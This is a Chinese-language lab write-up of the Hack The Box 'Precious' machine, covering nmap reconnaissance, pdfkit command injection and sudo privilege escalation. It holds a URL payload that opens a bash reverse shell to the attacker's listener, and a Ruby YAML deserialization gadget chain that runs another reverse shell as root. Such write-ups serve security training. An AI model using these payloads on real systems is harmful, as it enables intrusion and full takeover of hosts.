HTB Precious 靶机

IP端口探测

nmap 10.10.11.189 -A -sV -sS -O -v
Nmap scan report for 10.10.11.189
Host is up (0.35s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-methods: 
|_  Supported Methods: HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://precious.htb/
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 42.905 days (since Sat Feb 18 23:50:05 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   354.62 ms 10.10.14.1
2   354.88 ms 10.10.11.189

NSE: Script Post-scanning.
Initiating NSE at 22:33
Completed NSE at 22:33, 0.00s elapsed
Initiating NSE at 22:33
Completed NSE at 22:33, 0.00s elapsed
Initiating NSE at 22:33
Completed NSE at 22:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.17 seconds
           Raw packets sent: 1263 (57.200KB) | Rcvd: 1163 (47.940KB)

绑定域名precious.htb

Web是一个PDF打印，尝试命令执行

弹窗空白，下载PDF看看

查看PDF属性，搜索pdfkit漏洞

 Kali 监听6666端口

Web端执行 http://10.10.14.10:8000/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.14.10/6666 0>&1"`'}

反弹shell执行成功

ruby用户，查看home目录发现另一个用户henry　　

翻找ruby文件夹

在.bundle发现一个Key

 用Key进行SSH连接

当前目录发现flag

 对当前权限进行提权，sudo -l 发现ruby 和update_dependencies.rb

查看rb文件

Google 搜索dependencies exploit

参考链接https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/

Kali 监听7777端口接收shell

cd /tmp目录下 写入脚本赋予权限执行

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'sh -i >& /dev/tcp/10.10.14.10/7777 0>&1'"
         method_id: :resolve

提权到root权限，root目录获取flag